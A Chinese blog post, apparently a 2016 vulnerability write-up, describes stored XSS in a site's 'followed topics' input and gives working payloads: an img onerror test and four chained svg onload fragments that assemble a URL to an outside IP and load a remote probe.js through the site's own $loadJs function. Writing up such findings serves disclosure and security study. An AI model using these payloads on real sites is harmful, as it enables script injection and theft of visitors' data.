美文网首页
同一输入点的累计输入,构造完整XSS语句

同一输入点的累计输入,构造完整XSS语句

作者: 就是爱文艺 | 来源:发表于2016-07-19 10:02 被阅读156次

    某站 添加“我关注的话题”处,存在XSS

    在个人主页处点击添加话题,写入XSS测试 : <script>alert(1)</script>

    1.png

    点击确定后,页面无明显变化,在点击删除时才触发了弹窗:

    2.png

    此处用script标签触发条件较为苛刻。换用img标签再次测试:<img src=a onerror=alert(1)>

    3.png

    点击确定后,直接触发了弹窗:

    4.png

    接下来,就要尝试引入外部JS文件了。由于输入框有字数限制,无法一次性引入js文件,庆幸的是此处输入可以累计添加,后面的输入不会覆盖掉前面的。在引用通用的payload 时,又遇到了另一个问题,那就是即使截取成最短的长度,中间一句还是超过长度限制,这个时候就需要再考虑对方网站架构,观察js框架,最后找到了$loadJs()--> 对方网站的js api 。直接调用就好啦~~~
    下面 分四次添加这段xs代码:
    <svg onload="b='http://123'">
    <svg onload="b+='.206.93.11'">
    <svg onload="b+='/probe.js'">
    <svg onload="$loadJs(b)">

    5.png 6.png 7.png 8.png

    添加完成后,刷新页面,在接收端即可收到信息:


    9.png

    相关文章

      网友评论

          本文标题:同一输入点的累计输入,构造完整XSS语句

          本文链接:https://www.haomeiwen.com/subject/sajmjttx.html